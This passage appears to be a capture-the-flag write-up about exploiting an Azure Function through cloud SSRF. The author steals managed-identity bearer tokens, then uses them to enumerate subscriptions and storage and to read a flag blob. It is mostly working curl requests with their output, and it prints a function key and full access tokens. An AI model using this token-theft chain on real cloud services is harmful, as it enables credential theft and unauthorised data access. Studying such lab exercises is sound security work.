The Deployer App
error message suggested that we must include a query string parameter of Endpoint
.
Using Postman, I made it visit to a requestbin endpoint, but was greeted with a new error message
Copy { "statusCode" : 500 , "message" : "An unexpected error occured while fetching the AAD Token." , "correlationId" : "d64206c2-b852-4bbd-9938-672ee908b3d6" }
It shows an error fetching an AAD Token, which reminds me of a Cloud SSRF Attack.
Referring to HackTricks, I made the Endpoint=https://management.azure.com
and I am able to retrieve a bearer token.
Request
Copy curl --location 'https://rosarray.azurewebsites.net/api/Deployer?code=li1u2C-xrQ_xvUA5d18DUKcniUSAAd4NY_tS3KmsnTYGAzFuoYq5vw%3D%3D&Endpoint=https%3A%2F%2Fmanagement.azure.com'
Response
Copy {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvNWY0ODcyODMtYjg4ZS00YWRlLTgwMzUtN2JjYWFjNDE1NmIzLyIsImlhdCI6MTY3OTgzNzE2MiwibmJmIjoxNjc5ODM3MTYyLCJleHAiOjE2Nzk5MjM4NjIsImFpbyI6IkUyWmdZUGhxcEhreXVzRDh2VXZGZ3A4RnN6M3pBQT09IiwiYXBwaWQiOiI5ZjI0OGEzYy1mMTE2LTQ4NjUtYTFiZS00OGZmZDAzMDQ5MzciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC81ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI1ZDA0Y2M0YS1jNjdkLTQ2ZjgtYTQ1Ni0yY2QzMTU3NDdiYmEiLCJyaCI6IjAuQVh3QWczSklYNDY0M2txQU5YdktyRUZXczBaSWYza0F1dGRQdWtQYXdmajJNQk83QUFBLiIsInN1YiI6IjVkMDRjYzRhLWM2N2QtNDZmOC1hNDU2LTJjZDMxNTc0N2JiYSIsInRpZCI6IjVmNDg3MjgzLWI4OGUtNGFkZS04MDM1LTdiY2FhYzQxNTZiMyIsInV0aSI6Imp2WVlhdFJ2QjAtXzUyNzQ0QUtWQUEiLCJ2ZXIiOiIxLjAiLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy83YjliZDkxNi04YmQyLTQ0NDYtOTY3OC04NTMxZWY2NjNlZGIvcmVzb3VyY2Vncm91cHMvREFSVE1pc3Npb24vcHJvdmlkZXJzL01pY3Jvc29mdC5XZWIvc2l0ZXMvUk9TQXJyYXkiLCJ4bXNfdGNkdCI6MTY3ODg3NTYxMn0.L3CVBYSqNH1TO4YweUhNDnxFkF3K_mXcS1NEmQkMlPH1CKoy0mKY83bgg9G4ajZvts4hckI8KUU9mT3Fs-i8lPtlismbgkJdW_ZBgFexAA_0FRtJTXWerwe4x69Zr6Yw8FNNPii0YK-h1intntm-D96XSOri21DrCztoyLOaxTPMTt0jk-Oy491ohIYI36j6A2d_EQOXygrLc-7AzjM6ooAftsYqzLhUjKq3xAG1OAo5bT_ewYqmZKH8ZXTzsn27zwdbpfv86BrVevb6vZ5FlDuF9DG5jI-Iu1OO_U9SnKb3riprZTbq4EDXD_AWnXFli_WBsWWtYpa_FF24hgcK1w","expires_on":"03/27/2023 13:31:01 +00:00","resource":"https://management.azure.com","token_type":"Bearer","client_id":"9f248a3c-f116-4865-a1be-48ffd0304937"}
Referring to Azure Documentation and this github url , I used Postman to perform further enumeration of the permission.
I first retrieved the subscription ID by requesting https://management.azure.com/subscriptions?api-version=2020-01-01
Request
Copy curl --location 'https://management.azure.com/subscriptions?api-version=2020-01-01' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'
Response
Copy {
"value" : [
{
"id" : "/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb" ,
"authorizationSource" : "RoleBased" ,
"managedByTenants" : [] ,
"subscriptionId" : "7b9bd916-8bd2-4446-9678-8531ef663edb" ,
"tenantId" : "5f487283-b88e-4ade-8035-7bcaac4156b3" ,
"displayName" : "dartsub" ,
"state" : "Enabled" ,
"subscriptionPolicies" : {
"locationPlacementId" : "Public_2014-09-01" ,
"quotaId" : "PayAsYouGo_2014-09-01" ,
"spendingLimit" : "Off"
}
}
] ,
"count" : {
"type" : "Total" ,
"value" : 1
}
}
Then I attempt to retrieve a list of resources that the current user has access to.
Request
Copy curl --location 'https://management.azure.com/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb/resources?api-version=2019-10-01' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'
Response
Copy {
"value" : [
{
"id" : "/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb/resourceGroups/DARTMission/providers/Microsoft.Storage/storageAccounts/coresat" ,
"name" : "coresat" ,
"type" : "Microsoft.Storage/storageAccounts" ,
"sku" : {
"name" : "Standard_LRS" ,
"tier" : "Standard"
} ,
"kind" : "StorageV2" ,
"location" : "eastus" ,
"tags" : {}
}
]
}
I identify that the user has access to a storage account named coresat
. To perform further enumeration on the storage account, I will need to request a storage account
bearer token. Keeping in mind that the current bearer token is for management
.
Request
Copy curl --location https://rosarray.azurewebsites.net/api/Deployer?code=li1u2C-xrQ_xvUA5d18DUKcniUSAAd4NY_tS3KmsnTYGAzFuoYq5vw== & Endpoint = https://storage.azure.com
Response
Copy {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL3N0b3JhZ2UuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvNWY0ODcyODMtYjg4ZS00YWRlLTgwMzUtN2JjYWFjNDE1NmIzLyIsImlhdCI6MTY3OTgzNzMzNSwibmJmIjoxNjc5ODM3MzM1LCJleHAiOjE2Nzk5MjQwMzUsImFpbyI6IkUyWmdZSGdjUHBzLzRmaWxTd0t5Q1ZzK1Q3Z2ZDd0E9IiwiYXBwaWQiOiI5ZjI0OGEzYy1mMTE2LTQ4NjUtYTFiZS00OGZmZDAzMDQ5MzciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC81ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMvIiwib2lkIjoiNWQwNGNjNGEtYzY3ZC00NmY4LWE0NTYtMmNkMzE1NzQ3YmJhIiwicmgiOiIwLkFYd0FnM0pJWDQ2NDNrcUFOWHZLckVGV3M0R21CdVRVODZoQ2tMYkNzQ2xKZXZHN0FBQS4iLCJzdWIiOiI1ZDA0Y2M0YS1jNjdkLTQ2ZjgtYTQ1Ni0yY2QzMTU3NDdiYmEiLCJ0aWQiOiI1ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMiLCJ1dGkiOiJWNUNYeHhBMWFVS1huZ1VSdG1na0FRIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvN2I5YmQ5MTYtOGJkMi00NDQ2LTk2NzgtODUzMWVmNjYzZWRiL3Jlc291cmNlZ3JvdXBzL0RBUlRNaXNzaW9uL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL1JPU0FycmF5In0.KDEdC4IihcUOMWIpdgg1kZy3DtJirpirE1yL91Hc90YebkP_6tUcq-2zzSqo470AFyuAeht5hTsYgGClQj8xJPsAZckZG8SUWPBSCSoBXeP-29stnEhSkM6XOUf_wbPEtxM7IDgGaK9MboufCm5y4_un1_dg3BCqqacaQLBtBUoTiPG5Nfu1uBnK_Duy8g_e2XDLOSjaBUZIB4T1-mVlN6PnQciTHmhKGJdz1Mf-dL7yz8YCg0Yfzr7Iao6wel5XuIceT9TU7jQrgsXAKYkHU_zF5ETJG45IGm4KV_xCQCZg-SGfSbu1SGwqIJtS5rj6pplmwfqRZvC_eGwo3pENAA","expires_on":"03/27/2023 13:33:55 +00:00","resource":"https://storage.azure.com","token_type":"Bearer","client_id":"9f248a3c-f116-4865-a1be-48ffd0304937"}
Next I refer to this documentation to further enumerate the storage account.
Request
Copy curl --location 'https://coresat.blob.core.windows.net/?comp=list' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'
Response
Copy <? xml version = "1.0" encoding = "utf-8" ?>
< EnumerationResults ServiceEndpoint = "https://coresat.blob.core.windows.net/" >
< Containers >
< Container >
< Name >datahandling</ Name >
< Properties >
< Last-Modified >Wed, 15 Mar 2023 14:38:57 GMT</ Last-Modified >
< Etag >"0x8DB256302872266"</ Etag >
< LeaseStatus >unlocked</ LeaseStatus >
< LeaseState >available</ LeaseState >
< HasImmutabilityPolicy >false</ HasImmutabilityPolicy >
< HasLegalHold >false</ HasLegalHold >
</ Properties >
</ Container >
</ Containers >
< NextMarker />
</ EnumerationResults >
Now that we have the container name datahandling
, we can enumerate the blobs within the container, referring to this article .
Request
Copy curl --location 'https://coresat.blob.core.windows.net/datahandling?restype=container&comp=list' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'
Response
Copy <? xml version = "1.0" encoding = "utf-8" ?>
< EnumerationResults ServiceEndpoint = "https://coresat.blob.core.windows.net/" ContainerName = "datahandling" >
< Blobs >
< Blob >
< Name >Flag7.txt</ Name >
< Properties >
< Creation-Time >Fri, 17 Mar 2023 09:51:14 GMT</ Creation-Time >
< Last-Modified >Fri, 17 Mar 2023 09:51:14 GMT</ Last-Modified >
< Etag >0x8DB26CD25E0F3A3</ Etag >
< Content-Length >47</ Content-Length >
< Content-Type >text/plain</ Content-Type >
< Content-Encoding />
< Content-Language />
< Content-MD5 >d1UOmf3KFXonNzNJvZB+5Q==</ Content-MD5 >
< Cache-Control />
< Content-Disposition />
< BlobType >BlockBlob</ BlobType >
< AccessTier >Hot</ AccessTier >
< AccessTierInferred >true</ AccessTierInferred >
< LeaseStatus >unlocked</ LeaseStatus >
< LeaseState >available</ LeaseState >
< ServerEncrypted >true</ ServerEncrypted >
</ Properties >
</ Blob >
< Blob >
< Name >LORRI-Cert.txt</ Name >
< Properties >
< Creation-Time >Wed, 15 Mar 2023 14:39:51 GMT</ Creation-Time >
< Last-Modified >Wed, 15 Mar 2023 14:39:51 GMT</ Last-Modified >
< Etag >0x8DB256322B11B97</ Etag >
< Content-Length >6998</ Content-Length >
< Content-Type >application/octet-stream</ Content-Type >
< Content-Encoding />
< Content-Language />
< Content-MD5 >19wxEVC9dZDYVVICu9JmtQ==</ Content-MD5 >
< Cache-Control />
< Content-Disposition />
< BlobType >BlockBlob</ BlobType >
< AccessTier >Hot</ AccessTier >
< AccessTierInferred >true</ AccessTierInferred >
< LeaseStatus >unlocked</ LeaseStatus >
< LeaseState >available</ LeaseState >
< ServerEncrypted >true</ ServerEncrypted >
</ Properties >
</ Blob >
</ Blobs >
< NextMarker />
</ EnumerationResults >
There are 2 blob in the container, namely Flag7.txt
and LORRI-Cert.txt
Retrieving the Flag7.txt gives me the flag.
Request
Copy curl --location 'https://coresat.blob.core.windows.net/datahandling/Flag7.txt' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'
Response
Copy Flag 7 : All systems are functioning normally.
Flag 7 : All systems are functioning normally.